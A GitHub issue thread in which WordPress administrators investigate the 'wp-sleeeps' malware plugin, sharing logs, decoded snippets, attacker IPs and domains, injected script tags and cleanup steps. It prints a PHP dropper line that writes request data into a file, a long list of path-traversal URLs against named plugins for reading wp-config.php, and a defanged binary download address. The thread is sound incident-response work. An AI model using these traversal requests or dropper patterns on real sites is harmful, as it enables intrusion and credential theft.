### ISSUE TITLE
hackers will still have access though

### ISSUE THREAD

**Issue by Jossnaz** [kn1g/sleeepHackWordpress#1]
the culprit lies somewhere else

where? not sure

I recommend to you to install
Website File Changes Monitor

you will find plenty of weird file changes eventually

like

`lt_` , `php.ini` etc

which is used to inject the malicious javascript etc

be sure to create a snapshot and back it up locally so you can restore after getting hacked again (you will)

wp plugin called duplicator works fairly easy for backup

in our case I think its the theme that has a loohole

listing pro

```
[30-Dec-2020 13:45:42 UTC] PHP Warning:  file_get_contents(): Peer certificate CN=`us111.siteground.us' did not match expected CN=`ftp.lovegreenpencils.ga' in /home/customer/www/mysite.com/public_html/wp-content/plugins/wp-sleeeps/wp-sleeeps.php on line 26
[30-Dec-2020 13:45:42 UTC] PHP Warning:  file_get_contents(): Failed to enable crypto in /home/customer/www/mysite.com/public_html/wp-content/plugins/wp-sleeeps/wp-sleeeps.php on line 26
[30-Dec-2020 13:45:42 UTC] PHP Warning:  file_get_contents(https://ftp.lovegreenpencils.ga/mwrxvz?se_referrer=null&amp;source=http://mysite.com): failed to open stream: operation failed in /home/customer/www/mysite.com/public_html/wp-content/plugins/wp-sleeeps/wp-sleeeps.php on line 26
[30-Dec-2020 21:04:00 UTC] PHP Warning:  getimagesize(): Filename cannot be empty in /home/customer/www/mysite.com/public_html/wp-content/themes/listingpro/listing-loop.php on line 1410
[30-Dec-2020 21:04:00 UTC] PHP Warning:  Division by zero in /home/customer/www/mysite.com/public_html/wp-content/themes/listingpro/listing-loop.php on line 1411
[30-Dec-2020 21:04:00 UTC] PHP Warning:  getimagesize(): Filename cannot be empty in /home/customer/www/mysite.com/public_html/wp-content/themes/listingpro/listing-loop.php on line 1410
[30-Dec-2020 21:04:00 UTC] PHP Warning:  Division by zero in /home/customer/www/mysite.com/public_html/wp-content/themes/listingpro/listing-loop.php on line 1411
[30-Dec-2020 21:04:00 UTC] PHP Warning:  getimagesize(): Filename cannot be empty in /home/customer/www/mysite.com/public_html/wp-content/themes/listingpro/listing-loop.php on line 1410
[30-Dec-2020 21:04:00 UTC] PHP Warning:  Division by zero in /home/customer/www/mysite.com/public_html/wp-content/themes/listingpro/listing-loop.php on line 1411

```

attacker seems to cleanup behind himself as well so not sure if we can find the entrance point but it is somewhere that is certain.

attacker called plugin as well wp zzz or similar

basically what he wants to say with that imho is that he has access to the wp site, but the hack is sleeping until he decides to "wake up" the hack and be malicious.

**Comment by kn1g** [comment]
Thanks, interesting.. I will dig a little bit deeper into the files. I found a `lte_` file. I do not have access to the `php.ini`, my friend is on a hosted webspace

The plugin sounds like a good idea. I installed it. I will push my findings and what I did later today. 

This seems similar. My attack was slightly modified
https://txnkaro.com/blog/how-to-clean-js-donatelloflowfirstly-ga-virus-from-wordpress-site/

**Comment by Alkalurops** [comment]
Which version of Wordpress did you use? Something less than 5.6?

**Comment by kn1g** [comment]
Yes he had an old version. 

Sorry for not updating the post. I had some other issues because the theme crashed and I am prioritizing this currently

**Comment by Alkalurops** [comment]
No Problem, thanks for sharing it! No other information available, just a bunch of hacked sites show up in Google 😆 

On the server I discovered the infection on, the _wp-sleeps_ created a downloader called `lte_` that downloaded a Linux binary and executed it using `nohup` to run it as a server. I'm currently in contact with the server administrator to see if it is still running.

**Comment by Alkalurops** [comment]
Since restoring from a previous backup, updating the wordpress installations through the command line and changing all database names and passwords, no new infection detected in my installation... so far.

**Comment by Jossnaz** [comment]
reinfection last time we did a restore similar to what you did, it took like a month to be reinfected. At least, several weeks.

**Comment by Alkalurops** [comment]
Then maybe the Linux-Programm downloaded by `lte_` / `lt_` truly stays in memory and this is used to reinfect the system? I tried to warn the hosting provider, but he wouldn't listen.

**Comment by Jossnaz** [comment]
I don't know how they got in initially
if you dont really know how they got in initially, and you just broadly "apply some updates" and hope for the best, it could be that they come in through the same door again.

I down think, personally, it was related to `lt_` or `lte_`

most likely in my opinion was a breach in the theme files or plugins

what theme and plugins do you use?

what we noticed as well is "trash traffic" I think it was to cover up the access and attack. We got basically 0 traffic each day, and after the attack, we got 1000 hits a day. Enough to make tracing the actual attack impossible.


After doing, basically what you did - "change all passwords, update everything" we still got reinfected.
but after then disabling the file uploads, and removing some plugins entirely, the fake traffic all of the sudden dropped. Could be that that was key, or maybe was not. We will find out later. One of the plugins that were deleted (not disabled!) was duplicator, and wp file manager


to remove upload we added this to functions.php

```
function myprefix_remove_uploads(string $role){
  $role = get_role( $role );
  $role->remove_cap( 'upload_files' );
}
$all_roles = [
"administrator",
 "editor",
 "author",
 "contributor",
 "subscriber",
 "wpseo_manager",
 "wpseo_editor",
];

foreach($all_roles as $role){
myprefix_remove_uploads($role);
}

```

**Comment by Alkalurops** [comment]
I updated Wordpress to latest release as well as all plugins. Then I removed all themes except The7 twentytwenty and twentytwentyone. The initial introduction seemed to come from an older installation that was using a custom theme that hasn't been updated since 2019 afaik.

The `lte_` programm downloads a linux binary that gets loaded into memory. I guess it stays in the memory there, as long it is not explicitly killed by the server administrator or a restart is performed. 

This programm (I think written in GO) has SQL, crypto, archive, server, request, templating and many other functions built in. So I guess it is the one who is going through the database and modifies the files.

**Comment by Alkalurops** [comment]
I guess the name of the Malware author seems to be Jamie.

**Comment by Alkalurops** [comment]
it looks for configs in the form of these:

wordpress-scan.zip 
wp-admin/debug.log
wp-blog-header.phpwp-config.ORIGINAL
wp-config.originalwp-config.php.BACK
wp-config.php.COPY
wp-config.php.ORIG
wp-config.php.SAVE
wp-config.php.TEST
wp-config.php._INC
wp-config.php._inc
wp-config.php.back
wp-config.php.copy
wp-config.php.orig
wp-config.php.save
wp-config.php.test

**Comment by kn1g** [comment]
Sorry, still didn't have time to properly take care and investigate. I update the Readme with the new infos! Very helpful so far! I will definitely contact the provider, too.
Unfortunately, for some reason the whole layout broke with removing and updating... Hence, I have some more stuff to do which takes time.

**Comment by kn1g** [comment]
Hey, as I lack time these days, feel free to update the Readme. I created it because I was desperately looking for valuable resources. I think this discussion was already helpful for others. Hence, feel free to edit and share!

**Comment by Alkalurops** [comment]
Yeah, I think the software is a medium sophisticated GO program designed to stay in memory of a compromised host, extracting all kinds of information, looking for new infection targets and utilising a lot of dirty tricks. I will investigate further and report… 😃

**Comment by Alkalurops** [comment]
I guess it looks, if it can find one of these in the web server's htdocs, to detect if it can infect. Our system was one of these:
wordpress-3.3.2.zip
wordpress-4.9.8.zip
wordpress-5.1.1.zip
wordpress-5.2.1.zip
wordpress-5.2.2.zip
wordpress-5.2.3.zip
wordpress-5.3.2.zip
wordpress-5.4.1.zip
wordpress-5.4.2.zip
wordpress-5.5.1.zip
wordpress-5.5.3.zip

**Comment by Alkalurops** [comment]
There seem to be some obvious vulnerability exploits of the following plugins (one of them we did use, but on another site):
wp-content/plugins/db-backup/download.php?file=../../../wp-config.php
wp-admin/admin-ajax.php?action=kbslider_show_image&img=../wp-config.php
wp-admin/admin-ajax.php?action=duplicator_download&file=../wp-config.phpwp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php
wp-admin/admin-ajax.php?action=duplicator_download&file=/../wp-config.php
wp-content/themes/mTheme-Unus/css/css.php?files=../../../../wp-config.php
wp-content/plugins/eshop-magic/download.php?file=../../../../wp-config.php
wp-content/plugins/ungallery/source_vuln.php?pic=../../../../../wp-config.php
wp-content/plugins/tera-charts/charts/treemap.php?fn=../../../../wp-config.php
wp-content/plugins/ungallery/source_editf3.php?pic=../../../../../wp-config.php
wp-content/themes/churchope/lib/downloadlink.php?file=../../../../wp-config.php
wp-content/plugins/mac-dock-gallery/macdownload.php?albid=../../../wp-config.php
wp-content/themes/NativeChurch/download/download.php?file=../../../../wp-config.php
wp-content/plugins/mini-mail-dashboard-widgetwp-mini-mail.php?abspath=../../wp-config.php
wp-content/plugins/google-mp3-audio-player/direct_download.php?file=../../../wp-config.php
wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=../../../../wp-config.php
wp-content/plugins/wptf-image-gallery/lib-mbox/ajax_load.php?url=../../../../wp-config.php
wp-admin/admin.php?page=multi_metabox_listing&action=edit&id=../../../../../../wp-config.php
wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=../../../../wp-config.php
wp-admin/admin-ajax.php?action=ave_publishPost&title=random&short=1&term=1&thumb=../wp-config.php
wp-content/plugins/google-document-embedder/libs/pdf.php?fn=lol.pdf&file=../../../../wp-config.php
wp-content/plugins/aspose-doc-exporter/aspose_doc_exporter_download.php?file=../../../wp-config.php
wp-content/plugins/simple-image-manipulator/controller/download.php?filepath=../../../wp-config.php
wp-content/plugins/advanced-uploader/upload.php?destinations=../../../../../../../../../wp-config.php
wp-content/plugins/cherry-plugin/admin/import-export/download-content.php?file=../../../../../wp-config.php
wp-admin/admin.php?page=miwoftp&option=com_miwoftp&action=download&dir=/&item=wp-config.php&order=name&srt=yes
wp-admin/admin-ajax.php?action=cpabc_appointments_calendar_update&cpabc_calendar_update=1&id=../../../../../../wp-config.php
wp-content/plugins/wp-support-plus-responsive-ticket-system/includes/admin/downloadAttachment.php?path=../../../../../wp-config.php
wp-content/plugins/media-library-assistant/includes/mla-file-downloader.php?mla_download_type=text/htl&mla_download_file=wp-config.php

And some less obvious (I omitted a few accidentally):
/wp-content/plugins/drag-and-drop-multiple-file-upload-contact-form-7/assets/js/dnd-upload-cf7.js
/wp-content/plugins/easy-wp-smtp//wp-content/uploads/wpcf7_uploads
rwp-content/themes/holding_pattern/admin/upload-file.php
/wp-content/plugins/ait-csv-import-export/admin/assets/scripts/scripts.js

**Comment by Jossnaz** [comment]
@Alkalurops how did you find these security vulnerabilities?

**Comment by Alkalurops** [comment]
I looked into the programm

**Comment by Alkalurops** [comment]
If someone this good resorts to these attacks instead of just programming comfortably at a 9–5 job, it must somehow pay good.

**Comment by Jossnaz** [comment]
We dont seem to have a `lte_` file, only `lt_`

**Comment by Alkalurops** [comment]
These files download the programm

**Comment by Alkalurops** [comment]
what is in lt_ file?

**Comment by Jossnaz** [comment]
I dont want to post the exact content to make sure I dont get flagged by mistake but it looks somewhat like this:
the part I removed I marked with `...`

```
<?php /**pagenotfouuund**/ 
echo "<html><head><script>window.location.href=String.fromCharCode(104,116,116,112,115,58,47,47,105,114,99,46,108,111,118,101,...,100,61,52,51,54,55,53);</script></head><body></body></html>";
die();
```

**Comment by Jossnaz** [comment]
btw - we just got hacked again

seems like my approach didn't work so far

**Comment by Alkalurops** [comment]
Ah, that's just a redirect seemingly. The `lte_` downloaded the programm. Have you shell access? Then you could attempt to kill it

**Comment by Alkalurops** [comment]
It also seems to look into phpmyadmin, so if you have installed that, it could be compromised as well

**Comment by Alkalurops** [comment]
https://malwaredecoder.com/result/7488c8d83579cb099fc646423a417a84

Just found this!

**Comment by Jossnaz** [comment]
wp-sleeeps.php seems to create the `lt_` file in my case

actually I see that lte_ does get written as well in the wp-sleeeps.php file... 

they basically call

`file_put_contents('lte_', '<?php ' . base64_decode($_REQUEST['a']));`

how to get a sharable result therE?

**Comment by Alkalurops** [comment]
I think you can't, because the attacker/malware actually sends the file via a request with the parameter `a`.

**Comment by Alkalurops** [comment]
In my case the file lust was sitting there waiting to be found.

**Comment by Jossnaz** [comment]
No i meant the shareable result of the malwaredecoder.com

I pasted the hacker file here:
https://pastebin.com/L2zuUZbd

**Comment by Alkalurops** [comment]
You mean the linux file itself? Should we post it here? I think it might be dangerous.

**Comment by Alkalurops** [comment]
Thie file itself still seems to be located here: `http:// 95.181. 172.35/ 7767/ oyuiuyio`. I added the blanks so it does not become a link.

**Comment by Jossnaz** [comment]
yeah not sure if I would post that file publicly... 

hm well I dont have the time to look into it enough I fear.
the hosting provider does not seem to give access to see running processes


I don't find a file lte_ in my directories. But you actually do have it lying around, right?

**Comment by Alkalurops** [comment]
Yes, I downloaded it from the above location.

**Comment by Alkalurops** [comment]
(which was contained in the `lte_` file, which was sitting on the server still...)

**Comment by kn1g** [comment]
> https://malwaredecoder.com/result/7488c8d83579cb099fc646423a417a84
> 
> Just found this!

That matches with my decoding. I posted what I had in the Readme. @Jossnaz I put the content of the `lte_` file in the readme too. You can check it there. It is the very end of the file.

**Comment by mirkoschubert** [comment]
Hi, one of my client was affected with this yesterday, so maybe I can contribute some information about the hack.

In our case the `wp-sleeep` plugin wrote specifically to all php files with "index", "head" and "foot" (like in "header" and "footer") in their file names and nothing else, although I didn't see anything about it in the script. Two `lt_` files with the same JavaScript window.location redirection were written as well.

In the database **two** redirection links were set to every post in `wp_posts`, but both weren't valid links. The main link was also set in `site_url` and `home` of `wp_options`.

But it's going to get even more interesting:

I checked the access logs for the time the hack took place. The hacker (or bot) with an IP from Moscow got into PhpMySql and inserted his payload (six times). The he logged himself into `wp-admin` and went to the profile. After this the plugin was installed and activated. He tried to change the site URL in the options, but since it was already blocked in our installation, he got back to PhpMySql and changed it there.

By searching for "wp-sleeeps" in Google I found out that about 3000 websites got the same error message. Almost every website is in German, many of them were hosted by **Domain Factory**.

Why is this relevant? Because the hacker/ bot/ script specifically targets PhpMyAdmin, when it's reachable at `http://your-domain.de/sqladmin/` with a simple directory protection (or something similar). I didn't check all 3000 sites, but every website I checked had PhpMySql at `/sqladmin`.

**Comment by Jossnaz** [comment]
@mirkoschubert what you mean with "inserted his payload" ? can you see whether he inserted himself a user?

in our case, there is no access possible to /sqladmin - returns 404

with `PhpMySql ` you mean PhpMyAdmin?

like, in our case I'm not sure if it is easy at all to get into phpmyadmin.

**Comment by mirkoschubert** [comment]
@Jossnaz No, I don't think that he inserted himself as a user. He logged in with the first admin user after he was messing with the database. I suppose that he only inserted those window.location links into every post of the website.

Hm, I don't know your site, but every website I checked, had the PhpMyAdmin like [this](https://servgast.de/sqladmin/). And sorry, of course I mean `PhpMyAdmin`. :)

**Comment by Jossnaz** [comment]
so you think he changed the password hash of the first admin user? that would mean, the old password for that user no longer works.

thing is, we installed wordpress activity log https://wordpress.org/plugins/wp-security-audit-log/ and we didnt see any logins - but that might be due to different reasons

I imagine, if you have access to the files, you don't need to login. You can download and install a plugin via code alone, without any logins. Just an example: edit the index.php so that it downloads a plugin, and activates it each time it is called.

**Comment by mirkoschubert** [comment]
@Jossnaz I don't think that he changed the password. But there are other ways, i.e. rainbow tables. We had installed an activity log as well and this is what we got (it's partially in German):

<img width="722" alt="Screen Shot 2021-01-06 at 12 31 05 copy" src="https://user-images.githubusercontent.com/6443573/103832090-cc151580-507d-11eb-80b0-3ab07a65e747.png">

In short: There was a login, then the plugin zip file was uploaded as an attachment, installed it, deleted the attachment / media file and activated the plugin.

**Comment by Jossnaz** [comment]
@mirkoschubert what activity log did you use? because the one I used, didn't show plugin install of sleeps etc

**Comment by Alkalurops** [comment]
Our Server was hosted on domainfactory, too.

**Comment by mirkoschubert** [comment]
@Jossnaz I usually use [Simple History](https://github.com/kn1g/sleeepHackWordpress/issues/1) for this.

**Comment by kn1g** [comment]
Our Website was Hosted on DomainFactory too. I contacted them and they did a malware analysis but didn't tell me that this seems to be a widespread problem on their servers. I linked out discussion here in my report to them, too

**Comment by HarshithDev** [comment]
Hey guys i had the same issue,
I fixed it by doing the following, Looks fine so far it's been more than a day now, did not get the issue again

Steps i did:
1. Changed all the credentials
2. Changed public and private ip addresses
3. Stopped my server for a while, deleted lt_ file & wp-sleeeps folder from plugin folder directly. After deleting most importantly reset your file, folder permission. https://www.wpbeginner.com/beginners-guide/how-to-fix-file-and-folder-permissions-error-in-wordpress/ this link would guide to to reset.

Will also update if i get the issue back.

**Comment by mirkoschubert** [comment]
@kn1g Oh, I forgot: I contacted Domain Factory as well with a link to this discussion page. They said, they already know about the hack and try to harden the database login from their end.

@HarshithDev You should also check the following:

1. Especially change the database credentials at your server and the `wp-config.php`.
2. Check every php file in your WordPress installation (preferably every `index.php` and everything with "head" and "foot" in their names) for malicious code.
3. Make sure that you also delete any malicious code in the `wp-posts` table of your database. There can be multiple JS redirection items.
4. Harden the security in WordPress, .htaccess and phpMyAdmin. Make sure that every piece of software is up-to-date.

The malicious code should look something like this:

```html
<script type='text/javascript' src='https://port.transandfiestas.ga/stat.js\?stat=debug'></script>
```

The URL could be something else. For the specific code you can decode the obfuscated code in the `wp-sleeeps/wp-sleeeps.php` file.

Since we don't know for sure if the hacker/ bot uses phpMyAdmin for his advantage, please check your log files for clues how he got in and what he did.

**Comment by kn1g** [comment]
Thanks for the Info with DomainFactory. I talked to them and they claim to have fixed the issue. It was apparently a configuration mistake which made it able to access the DB for the hacker.

**Comment by saitarunsareddy** [comment]
Hi, same thing happened on our client site hosted on lightsail AWS. This was the second time. I was quickly able to delete files lt and lte_ along with wpsleeps plugin files and my site is back. Changed every password... I was able to get hackers ip.. I don't know how he created two user accounts and logged in.. I deleted them from mysql also.. check the screenshot below!

![Screenshot 2021-01-12 010514](https://user-images.githubusercontent.com/20499254/104229904-e3377700-5472-11eb-9f20-f5e85d9d1e31.jpg)

**Comment by mirkoschubert** [comment]
@saitarunsareddy Thank you, that's interesting! It's exactly the same IP address my client was attacked with. Maybe it helps to report an abuse to the webhost msk.host. At least the IP address is known for malicious attacks already: https://www.abuseipdb.com/check/95.181.157.100 ;-)

**Comment by saitarunsareddy** [comment]
@mirkoschubert I almost cleaned up entire site. Should I need to stop the instance and create a new one and move the site there?? As you said, the malware stays inside the memory, how to flush it out exactly? I have already rebooted multiple times to clear the memory maybe.

**Comment by mirkoschubert** [comment]
@saitarunsareddy Did I say that? My client is on shared webhosting, so he doesn't even have the option to restart the server.

Do you have a caching plugin in your WordPress installation? Flush it! And make sure, that the wp-sleeps plugin is fully deleted, so the hacker can't get back in.

**Comment by sabarish-prakash** [comment]
I'm working on the same issue now. My website is hosted on AWS. 

Apart from all the points above, I also found that the IPs - 75 . 165 . 166 . 234 & 81 . 161 . 63 . 101 - are constantly trying to login to my SSH.

**Comment by BlogSafe** [comment]
Just had someone hit one of our honeypots and gladly supplied us with the hosting, username and password of their wordpress mysql database.  Our honeypot initially probes that database and grabs the host and list of plugins from the wp-options table.  In this case, their database was hosting tables for 3 WordPress sites, all with the same domain name with parameters like this: 

`det.php?sit=flex&sid=2&yuid=1&`

The interesting part, multiple copies of the sleeeps.php plugin were on all 3 of the sites.  Here's the serialized array of plugins from one of them:

`a:4:{i:0;s:15:"jok3r/index.php";i:1;s:25:"wp-sleeeps/wp-sleeeps.php";i:2;s:25:"wp-sleeeps/wp-sleeeps.php";i:3;s:25:"wp-sleeeps/wp-sleeeps.php";}`

The IP that hit our honeypot was not the same as the one above.

**Comment by sabarish-prakash** [comment]
I further investigated my database and found several entries of the following scripts and URLs. I replaced all of them with "" or my base URL, as required. 

```
<script src=\'https://https;//main.travelfornamewalking.ga/stat.js?s=newrq\' type=\'text/javascript\'></script>

<script src=\'https://https;//port.transandfiestas.ga/stat.js?s=newrq\' type=\'text/javascript\'></script>

https;//port.transandfiestas.ga/det.php?id=34322-35-236-211

https;//fort.transandfiestas.ga/det.php?id=pn34322-35-236-211

https;//main.travelfornamewalking.ga/det.php?id=pn34322-35-236-211
```

**Comment by sabarish-prakash** [comment]
I found that the lt_ modified all .js files and inserted its own js code into the initial line of all js files. 

However, I did not find this on my website probably because I have file edit disabled.

**Comment by m3mojax** [comment]
https://wordpress.org/plugins/better-wp-security/ this plugin help's me to solve this.

**Comment by warudin** [comment]
I had to get rid of loads and loads of database entries containing a script tag as well:

<script src='https;//main.travelfornamewalking.ga/stat.js?n=ns1' type='text/javascript'></script>

**Comment by s21825** [comment]
Just to throw some more info into this thread:

I just encountered this issue on a wordpress site that was redirecting to travelfornamewalking.ga ...

In this case I only see the wp-sleeeps plugin and no extra files like _lt or _lte. The wp-sleeeps plugin is only doing two things:

1) Inserting the redirect script into admin_head and wp_head. It obfuscated the URL using .chr() as previously discussed.
2) It removes itself from the list of active plugins by adding a pre_current_active_plugins hook.

I'm not sure how the plugin was installed in the first place though.

**Comment by johnsondev-scoobydoobydoo** [comment]
Hey friends!

Just wanted to shine more light on this issue that may help give us some more info on this!

I was dealing with this type of issue with one of our client sites and since putting my fix in I haven't had issues.

**Friendly Heads Up**

Before someone with way more networking experience rips me apart; I am a UX/UI Design Person that builds Wordpress Website with Elementor. Your mileage may vary on the solution below:

First Thing I did was to try and determine the IP where this is happening from

Using the free version of this:
https://sucuri.net/

I got a notification of the plugin "wp-zzz" and "wp-sleeeps" being installed with an ip address attached.

Event: Plugin Activated
Website: https://CLIENTWEBSITE.com
IP Address: 95.181.152.83
Reverse IP: spot.com
Date/Time: TIME IT OCCURED
User: MY EMAIL ADDRESS

Message: Plugin activated: Wp Sleeeps (v1.5.3.2; wp-sleeeps/wp-sleeeps.php) 

Now that I have an IP it gave me somewhere to dig.

Using a ip checker to trace this back it would appear that the IP was coming out of Russia.

With all the info above; I dug into our hosting provider (Siteground) and found an IP Blocker Tool.

So, I simply placed that IP on block and voila! Problem over right?

Nope. 

Get hit again with a new IP:
95.181.157.100

Get hit again with a new IP:
95.181.152.193

ETC.

So then I learned about wildcard operators (i think that's the right term?)

So since placing this IP Block:

95.181.*

I've had zero issues!

tl;dr --> Determine IP of what's attacking you and block it!

**Comment by BlogSafe** [comment]
> tl;dr --> Determine IP of what's attacking you and block it!

Not a rip, just a tip.

While that may have prevented reinfections, you still haven't solved the problem of how those plugins got installed in the first place.   The IP our honeypot picked up with these same plugins was out of Arizona, not Russia.

I'd be interested in looking at those plugins if you still have them.

**Comment by Alkalurops** [comment]
The plugins that infected the sites I administer were very minimal, they just downloaded a bigger, compiled go binary that 
* accessed the database and spammed it
* installed the plugins in each and every wordpress reachable
* installed itself even in zip and tar files containing wordpresses
* seemed to look for specific wordpress installations (mentioned above) and plugins that were somehow vulnerable

**Comment by johnsondev-scoobydoobydoo** [comment]
> > tl;dr --> Determine IP of what's attacking you and block it!
> 
> Not a rip, just a tip.
> 
> While that may have prevented reinfections, you still haven't solved the problem of how those plugins got installed in the first place. The IP our honeypot picked up with these same plugins was out of Arizona, not Russia.
> 
> I'd be interested in looking at those plugins if you still have them.

Thank you so much for your feedback!

I've attached a ZIP including the WP-sleeps + wp-zzz plugins.

I've also attached a screenshot of one of our affected sites so you can see the plugin arrangement.

[wp-sleeps-and-wp-zzz.zip](https://github.com/kn1g/sleeepHackWordpress/files/6005367/wp-sleeps-and-wp-zzz.zip)
![wp-plugin-dashboard](https://user-images.githubusercontent.com/79275823/108410731-c4589d00-71f5-11eb-9706-c40891574458.jpg)

Let me know if I can help you with anything else.

**Comment by BlogSafe** [comment]
> The plugins that infected the sites I administer were very minimal, they just downloaded a bigger, compiled go binary that
> 
> * accessed the database and spammed it
> * installed the plugins in each and every wordpress reachable
> * installed itself even in zip and tar files containing wordpresses
> * seemed to look for specific wordpress installations (mentioned above) and plugins that were somehow vulnerable

Yep, I'm seeing that.  Will take a min to decode all the chr's they used.

**Comment by BlogSafe** [comment]
> > > tl;dr --> Determine IP of what's attacking you and block it!
> > 
> > 
> > Not a rip, just a tip.
> > While that may have prevented reinfections, you still haven't solved the problem of how those plugins got installed in the first place. The IP our honeypot picked up with these same plugins was out of Arizona, not Russia.
> > I'd be interested in looking at those plugins if you still have them.
> 
> Thank you so much for your feedback!
> 
> I've attached a ZIP including the WP-sleeps + wp-zzz plugins.
> 
> I've also attached a screenshot of one of our affected sites so you can see the plugin arrangement.
> 
> [wp-sleeps-and-wp-zzz.zip](https://github.com/kn1g/sleeepHackWordpress/files/6005367/wp-sleeps-and-wp-zzz.zip)
> ![wp-plugin-dashboard](https://user-images.githubusercontent.com/79275823/108410731-c4589d00-71f5-11eb-9706-c40891574458.jpg)
> 
> Let me know if I can help you with anything else.

Thanks!  Will take a few to decode everything but already seeing some interesting tricks they used.
One was to 'attempt' to remove the wp-sleeeps from the main plugin list so that you'd never see it.
Not many go to the trouble of making an actual WP malware plugin.

Here's some thing I just quickly spotted to look for:
Files named lte_
This url: https://port.transandfiestas.ga

**Comment by jkirker** [comment]
I'm not sure if adding this is helpful but noticed that @BlogSafe was using Elementor and Ultimate Addons for Elementor.  This article makes reference to them.  I have a site that is no longer active and is mainly redirecting traffic to a new domain for a company - and because of this it wasn't actively monitored.  Digging back in the database it looks like their install was compromised late 2020/11/14 or the early morning of 2020/11/15.  Anyhow, this article may have gleaned data from this thread or they may have arrived at the details on their own.  I don't believe that they are related to Sujay and the folks from BrainStormForce (Makers of Ultimate AddOns for Elementor and Beaver Builder and the Astra theme.)  The site we found the issue on did have Ultimate Addons for Beaver Buidler.  I do recall a few vulnerabilities in their plugins and themes in the past, so perhaps this was a remnant issue - we'll see if the site is reinfected at some point.  I restored a pre-hack database and refreshed all WP code and plugins.  Maldet and Clam find nothing of interest.

https://www.getastra.com/blog/911/plugin-exploit/redirection-attacks-on-wordpress-websites-digestcolect/

**Comment by BlogSafe** [comment]
> I'm not sure if adding this is helpful but noticed that @BlogSafe was using Elementor and Ultimate Addons for Elementor. 

I'm not sure what site you were looking at but we don't use either of those.

As far as how they tried to get into our honeypot system, it was by running a WP install script.

**Comment by jkirker** [comment]
> I'm not sure what site you were looking at but we don't use either of those.

Pardon me, meant to tag @johnsondev-scoobydoobydoo
